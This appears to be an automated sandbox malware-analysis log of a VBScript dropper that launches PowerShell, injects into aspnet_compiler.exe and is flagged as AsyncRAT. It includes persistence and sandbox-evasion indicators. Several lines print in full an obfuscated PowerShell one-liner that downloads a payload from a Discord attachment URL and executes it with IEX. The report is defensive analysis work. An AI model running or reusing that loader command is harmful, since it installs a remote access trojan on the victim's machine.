Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://cdn.discordapp.com/attachments/833416270924742669/869658503759937606/dola2021.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')\|&('I'+'EX');	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.282275640.0000019FCDDE0000.00000004.00000001.sdmp
Source:	Binary string: Console.pdb source: powershell.exe, 00000003.00000002.264815805.0000019FB5840000.00000004.00000001.sdmp

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions

Show sources

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: .Run("POWERsHELL $TRUMP ='https://cdn.discordapp.com/attachments/833416270924742669/869658503759937606/dola2021.txt';$B", "0")

.NET source code contains potential unpacker

Show sources

Source: 11.2.aspnet_compiler.exe.400000.0.unpack, Client/Handle_Packet/Packet.cs

.Net Code: Invoke System.Reflection.Assembly System.AppDomain::Load(System.Byte[])

Obfuscated command line found

Show sources

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://cdn.discordapp.com/attachments/833416270924742669/869658503759937606/dola2021.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')\|&('I'+'EX');
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://cdn.discordapp.com/attachments/833416270924742669/869658503759937606/dola2021.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')\|&('I'+'EX');			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFAEE568A83 push B9FFFFFFh; retn 0004h		3_2_00007FFAEE568A88
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFAEE567273 push ebx; iretd		3_2_00007FFAEE56731A

Boot Survival:

Yara detected AsyncRAT

Show sources

Source: Yara match	File source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.powershell.exe.19fb5fc3208.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.powershell.exe.19fb67b2de0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.powershell.exe.19fb67b2de0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.powershell.exe.19fb5fc3208.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.275049815.0000019FB696D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.268623513.0000019FB5FBA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.726757646.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6080, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 4652, type: MEMORYSTR

Creates an undocumented autostart registry key

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AsyncRAT

Show sources

Source: Yara match	File source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.powershell.exe.19fb5fc3208.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.powershell.exe.19fb67b2de0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.powershell.exe.19fb67b2de0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.powershell.exe.19fb5fc3208.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.275049815.0000019FB696D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.268623513.0000019FB5FBA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.726757646.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6080, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 4652, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: powershell.exe, 00000003.00000002.268623513.0000019FB5FBA000.00000004.00000001.sdmp, aspnet_compiler.exe, 0000000B.00000002.726757646.0000000000402000.00000040.00000001.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4764			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4215			Jump to behavior

